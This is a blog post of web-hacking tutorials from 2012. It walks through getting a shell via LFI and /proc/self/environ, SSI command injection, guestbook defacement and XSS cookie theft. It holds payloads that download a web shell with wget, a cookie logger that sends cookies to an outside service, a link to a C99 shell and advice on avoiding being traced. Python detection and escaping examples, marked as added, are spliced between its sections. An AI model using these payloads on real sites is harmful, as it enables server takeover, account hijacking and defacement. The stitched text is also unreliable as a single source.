Saturday, May 12, 2012

1 – Introduction

In this tutorial I show how to get a shell on a website through a Local File Inclusion (LFI) vulnerability by injecting PHP code into the web server process environment and then including /proc/self/environ. It is a step by step tutorial.

2 – Finding LFI

- First we need a website with a Local File Inclusion vulnerability. Say we found a target; let's check it:
www.website.com/view.php?page=contact.php
- Now let's replace contact.php with ../ so the URL becomes
www.website.com/view.php?page=../
and we get an error:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
The warning shows that the page parameter goes straight into include(), so there is a good chance of a Local File Inclusion vulnerability (if display_errors is off you get no warning and have to test blind with the next step). Let's go to the next step.

- Now let's include /etc/passwd to confirm the vulnerability. Make the request:
www.website.com/view.php?page=../../../etc/passwd
We get an error and no /etc/passwd file:
Warning: include(../../../etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up. The script lives in /home/sirgod/public_html/website.com/, four levels below /, so at least four ../ are needed; extra ones do no harm because ../ from / stays at /:
www.website.com/view.php?page=../../../../../etc/passwd
We successfully included the /etc/passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
3 – Checking if /proc/self/environ is accessible

- Now let's see if /proc/self/environ is readable. We replace etc/passwd with proc/self/environ:
www.website.com/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
(The file is NUL-separated, so the browser shows it as one run-together line; it is split one variable per line here. This dump was captured on a page called index.php with a view parameter, hence the different names from the rest of the walkthrough.)
/proc/self/environ is accessible. Two things in the dump matter for the next step: the request headers (HTTP_USER_AGENT, HTTP_REFERER, QUERY_STRING) are in there, and GATEWAY_INTERFACE=CGI/1.1 tells us PHP runs as a CGI process, which is why its environment carries the headers of the current request. Under mod_php, /proc/self/environ belongs to the long-running Apache child and does not contain per-request headers, so this trick does not work there. If you get a blank page or an error, /proc/self/environ is not readable (an open_basedir restriction, or /proc not mounted, which is the default on FreeBSD).

4 – Injecting malicious code

- Now let's get our PHP code into /proc/self/environ. How? Every HTTP request header is exported into the CGI process environment (see HTTP_USER_AGENT in the dump above), so we put the code in the User-Agent header; when view.php includes /proc/self/environ, PHP parses it and executes whatever sits between the PHP open and close tags.
Use the Tamper Data add-on for Firefox (or any intercepting proxy, or curl -A) to change the User-Agent. Start Tamper Data in Firefox and request the URL:
www.website.com/view.php?page=../../../../../proc/self/environ
Choose Tamper and in the User-Agent field write the following code:
<?php system('wget http://hack-bay.com/Shells/gny.txt -O shell.php'); ?>
{The Unknown: the link of the shell used has expired, use the link I posted at the end of this thread}
(The original uses the short <? ... ?> tag, which only works when short_open_tag is on; <?php ... ?> works on every configuration.)

Then submit the request.

Our command is executed through system(): wget downloads the text-format shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the link I posted at the end of this thread} and saves it as shell.php in the working directory of the PHP process (normally the directory of the script, i.e. the website directory), and our shell is created. If it doesn't work, try exec(), passthru() or shell_exec(), because system() may be disabled through disable_functions in php.ini; wget also has to be installed, outbound HTTP has to be allowed from the server, and the web directory has to be writable by the web server user. Keep in mind that the injected User-Agent is written to the web server's access log, where it is an obvious indicator of this attack.

5 – Access our shell

- Now let's check whether our code was executed and the shell is present:
www.website.com/shell.php
Our shell is there. The injection was successful.
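What this whole procedure looks like from the defender's side, as an added example that is not part of the original tutorial: a small Python scanner over constructed Apache access-log lines (the IPs, timestamps and the 198.51.100.7 shell host are made up) that flags the traversal, the /etc/passwd and /proc/self/environ reads including the double-URL-encoded form, and the PHP open tag that the injection leaves behind in the User-Agent field.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines replaying the walkthrough above (not a real log).
# The injected PHP lands in the User-Agent field; line 4 uses a double-encoded path.
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2012:10:01:02 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2012:10:01:09 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1290 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2012:10:01:20 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2012:10:01:31 +0000] "GET /view.php?page=..%252F..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 2210 "-" "<?php system('wget http://198.51.100.7/s.txt -O shell.php'); ?>"
198.51.100.9 - - [12/May/2012:10:02:00 +0000] "GET /shell.php HTTP/1.1" 200 8801 "-" "Opera/9.80"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r'\.\.[/\\]')
SENSITIVE = re.compile(r'/etc/passwd|/etc/shadow|/proc/self/(environ|fd/)|/var/log/', re.I)
PHP_TAG = re.compile(r'<\?(?!xml)')  # "<?php", "<?=" and the short "<?" form


def fully_decode(value, rounds=3):
    """URL-decode repeatedly so %252F (double-encoded "/") is seen as "/" too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse(line):
    """Return a finding for one log line, or None when it carries no LFI indicator."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = fully_decode(m['path'])
    reasons = []
    if TRAVERSAL.search(path):
        reasons.append('traversal')
    if SENSITIVE.search(path):
        reasons.append('sensitive-file')
    # The PHP tag can be smuggled in any header that ends up in the environment.
    if any(PHP_TAG.search(fully_decode(m[field])) for field in ('ua', 'referer', 'path')):
        reasons.append('php-tag-in-request')
    if not reasons:
        return None
    return {'ip': m['ip'], 'path': path, 'status': int(m['status']), 'reasons': reasons}


def scan(log_text):
    """All findings for a block of log text, in log order."""
    return [finding for finding in map(analyse, log_text.splitlines()) if finding]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['status'], ','.join(hit['reasons']), hit['path'])
```

The last sample line, the request for the freshly dropped shell.php, is deliberately not caught by these signatures; correlating a previously unseen .php path that returns 200 shortly after a php-tag-in-request hit from the same site is the natural next step for a real detection.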

Most of the credits go to: Konvict from glitcheaven.com


SSI (Server Side Includes)


1- What is It?

A Server Side Include (SSI) injection attack is a very useful attack for executing commands on the server. To make use of it you need basic knowledge of Bash (or Windows batch) so you know which commands help compromise the server.

2- What Sites are Vulnerable?

For a site to be vulnerable to SSI injection, server side includes must be enabled in the web server configuration for the page (on Apache that means Options +Includes plus the INCLUDES output filter or XBitHack, by default only for files ending in .shtml, .shtm or .stm), and user input must be written into such a page without being HTML-encoded. Apache, lighttpd and IIS all support SSI. Two caveats: Apache's Options +IncludesNOEXEC allows includes but refuses #exec, and any command that does run does so as the web server's user.

3- Testing for SSI Injection

To audit a site for SSI injection, look through its directories for .shtml, .shtm or .stm extensions; if you find any, SSI is probably enabled, and if you don't, it may still be enabled. It affects pages that reflect unsanitized input (no filtering or encoding of <!--#exec ... -->). To test, enter the following directive into the request:

<!--#exec cmd="ls" -->

If a directory listing appears in the page, it is vulnerable; if the server is Windows, replace ls with dir. The syntax is strict: the directive starts with <!--# (no space after the <), the attribute value is double-quoted, and there is a space before -->. You test for SSI the same way as for XSS; you can put the directive into
- Textboxes/search boxes
- Headers
- Cookies
- Address bar

4- Useful Commands

-Show files, Linux

<!--#exec cmd="ls" -->

-Show files, Windows

<!--#exec cmd="dir" -->

-Read /etc/passwd

<!--#include virtual="/etc/passwd" -->

(On Apache, virtual is a URL path served through an internal subrequest, so this reads <DocumentRoot>/etc/passwd and only reaches the real file if an Alias or similar maps it; <!--#exec cmd="cat /etc/passwd" --> is the reliable way.)

-Which user the web server runs as

<!--#exec cmd="whoami" -->

-Download a shell to the server to get full control (the URL is a placeholder for wherever you host the shell, e.g. the one linked at the end of this thread)

<!--#exec cmd="wget http://<your-host>/shell.txt -O shell.php" -->
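To make the directive processing and the fix concrete, here is an added example (my code, not from the tutorial or its source): a miniature mod_include in Python with a constructed in-memory document root and a fake shell, so nothing really runs. It shows a guestbook comment being expanded when it is written raw into a .shtml page, the same comment neutralised by HTML-encoding it first, IncludesNOEXEC refusing #exec, and why include virtual="/etc/passwd" comes back as an error while exec cmd="cat /etc/passwd" does not. The directive handling is simplified to what the example needs.

```python
import html
import posixpath
import re

# Apache-style SSI directive: <!--#name attr="value" ... --> with a space before "-->".
DIRECTIVE = re.compile(r'<!--#\s*(?P<name>\w+)\s+(?P<attrs>[^>]*?)\s*-->', re.S)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
SSI_ERROR = '[an error occurred while processing this directive]'

# Constructed stand-in for the document root (URL path -> file content). There is
# deliberately no /etc/passwd here: "include virtual" is resolved as a URL path below
# the document root, so the real /etc/passwd is not reachable through it.
DOCROOT = {
    '/header.html': '<h1>Site</h1>',
    '/footer.html': '<p>(c) 2012</p>',
}


def fake_shell(cmd):
    """Stand-in for the shell behind "#exec cmd", so nothing actually runs on this machine."""
    canned = {
        'ls': 'guestbook.shtml index.shtml',
        'whoami': 'www-data',
        'cat /etc/passwd': 'root:x:0:0:root:/root:/bin/bash',
    }
    return canned.get(cmd, '')


def render_ssi(page, docroot=DOCROOT, allow_exec=False, run=fake_shell):
    """Expand the SSI directives in `page` roughly the way mod_include would.

    Returns (rendered_page, list_of_commands_executed). allow_exec=False mirrors
    Apache's "Options +IncludesNOEXEC": "#include" still works but "#exec" is refused.
    """
    executed = []

    def expand(m):
        name = m['name'].lower()
        attrs = dict(ATTR.findall(m['attrs']))
        if name == 'include' and 'virtual' in attrs:
            # Normalise the URL path and pin it under the document root ("/../x" -> "/x").
            path = posixpath.normpath('/' + attrs['virtual'].lstrip('/'))
            return docroot.get(path, SSI_ERROR)
        if name == 'exec' and 'cmd' in attrs:
            if not allow_exec:
                return SSI_ERROR
            executed.append(attrs['cmd'])
            return run(attrs['cmd'])
        return SSI_ERROR

    return DIRECTIVE.sub(expand, page), executed


# A guestbook.shtml that writes the visitor's comment into the page.
GUESTBOOK = '<!--#include virtual="/header.html" --><p>Comment: {comment}</p>'


def guestbook_page(comment, escape):
    """Build the page source. With escape=True the comment is HTML-encoded first, which
    turns "<!--#" into "&lt;!--#" so mod_include never sees a directive (the fix)."""
    body = html.escape(comment, quote=True) if escape else comment
    return GUESTBOOK.replace('{comment}', body)


if __name__ == '__main__':
    comment = '<!--#exec cmd="whoami" -->'
    for escape in (False, True):
        for allow in (True, False):
            out, ran = render_ssi(guestbook_page(comment, escape), allow_exec=allow)
            print(f'escape={escape!s:5} exec_allowed={allow!s:5} ran={ran} -> {out}')
```

The two defences are independent: IncludesNOEXEC stops the command even when the comment is written raw, and output encoding stops the directive from being parsed at all, which also covers #include. In a real deployment you want both, since an attacker who cannot run commands can still use #include to pull other files below the document root into the page.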

5- Dorks

Similar to SQLi dorks, these return a list of sites that may or may not be vulnerable to SSI injection:
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Those are a few to start you off, but it is easy to think of your own.

All credits go to: http://doonstuntsmania.com/

HTMLi (HTML Injection)


1- HTML injection, or guestbook defacing, is a way to deface a guestbook: the guestbook writes your comment into its page as raw HTML, so you can post a "hacked" comment that renders as markup. You can also add music and more...

2- How to do it?

Firstly, you need a dork.
We will use this one:
guestbook.asp
1. Now simply search for that on Google and you'll find some guestbooks...
2. Pick one of the guestbooks
3. Copy and paste an HTML snippet (see bottom) as the comment
4. Publish the comment
5. Now, if it worked, it will show up as nice colourful text with some music...
6. If it didn't work, find another guestbook and try again.

So this is pretty useless but fun.

Here is, by the way, the guestbook which I hacked...
http://www.furoreinn.it/en/guestbook.asp
All credits go to: Tuhoaja from pvhax.com
And here is something you will need for RFI and LFI: C99 shell: http://www.mediafire.com/?b3sl39jusygszc3 (it's a .php file; if you want to serve it as .txt, as in the LFI tutorial above, just rename it, the contents stay the same)
Hope you all liked it this Thread full of Tutorials,
Thanks for reading,

The Unknown.


XSS (Cross Site Scripting)
In this tutorial I will explain the procedure of cookie stealing via XSS in simple steps. It can be applied to any website, but in this tutorial I will use this one: http://www.TheUnknown.com/

Step one: Finding an XSS vulnerability

Everyone who wants to learn cookie stealing via XSS already knows this part, so I won't explain it in detail here.

Here I will stick to reflected XSS in a GET variable to make it easier.

Here's our PoC XSS vulnerability:
http://www.TheUnknown.com/search.php?query="><script>alert(123)</script>
When this page is loaded a message box pops up saying "123"; this means we have our vulnerability.


Step two: Setting up a cookie stealer

We will use PHP of course; here's an example of a simple cookie stealer:
<?php
// Appends whatever arrives in ?cookie= to log.txt, one entry per blank-line-separated block.
// $HTTP_GET_VARS was removed in PHP 5.4; $_GET is its replacement.
$cookie = isset($_GET["cookie"]) ? $_GET["cookie"] : '';
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>
(You can find lots of them all over HF; just use the Search button at the top of the page.)

There are lots of ways to log a cookie as well; the best one in my opinion can be found here (it is more secure): http://ccl.whiteacid.org/. If you use your own it will be easy to track you down, which is why we will use this one: it also gives you an anonymous account with a random ID number instead of a username. For this tutorial I will be using this ID: 123456

Now let's check the service; to do that, follow the link:
http://ccl.whiteacid.org/log.php?123456test_for_XSS
As you see, THE ID MUST BE INCLUDED IN THE TEST URL.
Now we log in to http://ccl.whiteacid.org/ and see the new entry with our IP, referer, user agent and of course the data "test_for_XSS". The cookie logger works fine.


Step three: Logging a cookie

So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.

We make a new injection (instead of the alert) which sends the cookie data. It could look like this:
http://www.TheUnknown.com/search.php?query="><script>location.href='http://ccl.whiteacid.org/log.php?123456'+document.cookie;</script>
If the site doesn't use addslashes() or any other filter that mangles our injection, the victim's browser is redirected to the logger and the cookie is saved in our account. From there we can copy the victim's cookies (most commonly the session cookie) into our own browser and get into their account. One limit to keep in mind: a cookie set with the HttpOnly flag is not readable from document.cookie and will not show up in the log.


Step four: Filter evasion

Let's say we run into the following common problem: the target page applies addslashes() to the GET variable before printing it, which kills our injection by putting a backslash before every quote (the <script> tag itself still gets through, since addslashes() does not touch angle brackets, but the JavaScript inside no longer parses). No problem, we just do it another way.

We register a new account on a free hosting site (I'll use FreeWebs.com) and create a new script file there. I make a file called cookiesteal.js with the following content:
location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;
Now we load the script through the XSS-vulnerable page with a payload whose script tag needs no quotes (the src attribute is left unquoted), so addslashes() has nothing to break; the leading " still closes the attribute because HTML does not treat a backslash as an escape:
http://www.TheUnknown.com/search.php?query="><script src=http://www.freewebs.com/uber0n/cookiesteal.js></script>
Log in to http://ccl.whiteacid.org once again and you'll see the new entry. However, remember NOT to register the account on the hosting site under your normal nickname, and make sure you register through a good proxy so that you can't be tracked. You can also ask XSSed.com to host your script files.

If you encounter other filters than addslashes(), try running the scripts through iframes, images etc.
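The filter-evasion point above (and the guestbook HTML injection earlier on this page) comes down to using the wrong encoder for the context, so here is an added example in Python, not from the original tutorial: PHP-style addslashes() and htmlspecialchars() applied to the two payload styles on a constructed search page (attacker.example and the file names are placeholders), with Python's HTML parser standing in for the browser to report which <script> elements survive.

```python
import html
from html.parser import HTMLParser


def addslashes(s):
    """PHP's addslashes(): a backslash before ' " \\ and NUL. It is a (poor) SQL-string
    escape, not an HTML encoder, so angle brackets pass straight through."""
    out = []
    for c in s:
        if c in "'\"\\":
            out.append('\\' + c)
        elif c == '\0':
            out.append('\\0')
        else:
            out.append(c)
    return ''.join(out)


def htmlspecialchars(s):
    """PHP's htmlspecialchars($s, ENT_QUOTES): the right encoder for HTML text and attributes."""
    return html.escape(s, quote=True)


def unfiltered(s):
    return s


class ScriptFinder(HTMLParser):
    """Collects every <script> element a browser would see: its src and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.scripts.append({'src': dict(attrs).get('src'), 'body': ''})
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1]['body'] += data

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False


def scripts_in(page):
    parser = ScriptFinder()
    parser.feed(page)
    parser.close()
    return parser.scripts


# Constructed search page: the query is reflected into an attribute value, which is why
# both payloads start with "> to close the attribute and the <input> tag first.
TEMPLATE = '<input type="text" name="query" value="{value}">'


def search_page(query, sanitizer=unfiltered):
    return TEMPLATE.replace('{value}', sanitizer(query))


# Hypothetical attacker host (not from the page) for the two payload styles.
QUOTED = ('"><script>location.href=\'http://attacker.example/log.php?\''
          '+document.cookie;</script>')
UNQUOTED = '"><script src=http://attacker.example/c.js></script>'


def compare(query):
    """Injected <script> elements that survive each filter, keyed by filter name."""
    filters = (('none', unfiltered), ('addslashes', addslashes),
               ('htmlspecialchars', htmlspecialchars))
    return {name: scripts_in(search_page(query, fn)) for name, fn in filters}


if __name__ == '__main__':
    for label, payload in (('quoted', QUOTED), ('unquoted src', UNQUOTED)):
        for name, found in compare(payload).items():
            print(f'{label:12} {name:17} -> {found}')
```

With addslashes() the quoted payload still injects a <script> element but its body contains \' and no longer parses as JavaScript, which is exactly the failure the tutorial describes; the unquoted src payload reaches the browser untouched. htmlspecialchars() removes the element in both cases because the < that opens the tag is encoded, and the same encoding applied to guestbook comments stops the HTML injection in the previous section.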



Thanks for reading, enjoy.

3 comments:

  1. wow, great tutorial.. Thanks for the info man

  2. I want to learn SQLi too... plz post a highly detailed one soon

  3. Thanks for your marvelous posting! I genuinely enjoyed reading
    it, you could be a great author. I will ensure that I bookmark your blog and will often come back sometime soon. I want to encourage you to
    continue your great writing, have a nice afternoon!

    Also visit my webpage garage door motor
